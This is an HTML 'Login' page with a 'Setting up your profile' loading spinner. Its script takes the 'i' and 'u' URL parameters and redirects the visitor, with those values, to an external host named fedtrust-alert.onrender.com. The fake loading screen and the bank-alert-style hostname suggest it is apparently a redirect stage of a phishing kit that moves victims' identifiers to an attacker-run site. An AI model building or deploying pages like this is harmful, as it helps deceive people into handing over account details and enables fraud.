<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>


    <script type="module">

        const url = window.location.search;
        const urldata = new URLSearchParams(url);
        const i = urldata.get("i")
        const u = urldata.get("u")

        if(u){
            window.location.href=`https://fedtrust-alert.onrender.com/register/welcome.html?i=${i}&u=${u}`
        }else{
            window.location.href="index.html"
        }



    </script>

</head>
<body>
    <div class="min" >
        <img class="immg" src="../images/bg-rmv.png" alt="">
        <h2 style="color: rgb(2, 68, 68); padding: 1%; text-align: center;">Setting up your profile  <br> Please wait to load up</h2>
      
    </div>
    <div id="box-container">
        <div class='boxes box1'></div>
        <div class='boxes box2'></div>
        <div class='boxes box3'></div>
      </div>
      <div class="text">
        <b>Loading...</b>
      </div>

    <style>
        .min{
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;

        }
        .immg{
            width: 40%;
            margin-top: 10%;
        }
        @media screen and (max-width:992px) {
          .immg{
            width: 70%;
            margin-top: 30%;
            }
      }


      /* SPINNER */


      *{
  border: none;
  padding: 0;
  margin: 0;
  box-sizing: border-box;
}

#box-container{
  width: 150px;
  margin: 40px auto 20px auto;
}
.text{
  width: 100%;
  text-align: center;
  color: rgb(12, 118, 124);
  font-size: 20px;
  font-family: 'Ubuntu', sans-serif;
  letter-spacing: 1px;
}
.boxes{
  width: 50px;
  height: 50px;
  background: rgb(27, 88, 105);
  position: relative;
}
.box1{
  position: relative;
  animation: moveBox1 1s ease-in-out infinite;
  left: 0;
}
@keyframes moveBox1{
  0%{
    left: 0;
  }
  25%{
    top: 0;
    left: 100px;
  }
  50%{
    left: 100px;
    top: 100px;
  }
  75%{
    top: 100px;
    left: 0;
  }
  100%{
    top: 0;
    left: 0;
  }
}

.box2{
  background: rgb(32, 202, 151);
  left: 50px;
}
.box3{
  animation: moveBox3 1s ease-in-out infinite;
/*   left: 50px; */
}

@keyframes moveBox3{
  0%{
    top: 0;
    left: 0;
  }
  25%{
    top: -100px;
    left: 0;
  }
  50%{
    top: -100px;
    left: 100px;
  }
  75%{
    top: 0;
    left: 100px;
  }
  100%{
    top: 0;
    left: 0;
  }
}
    </style>
</body>
</html>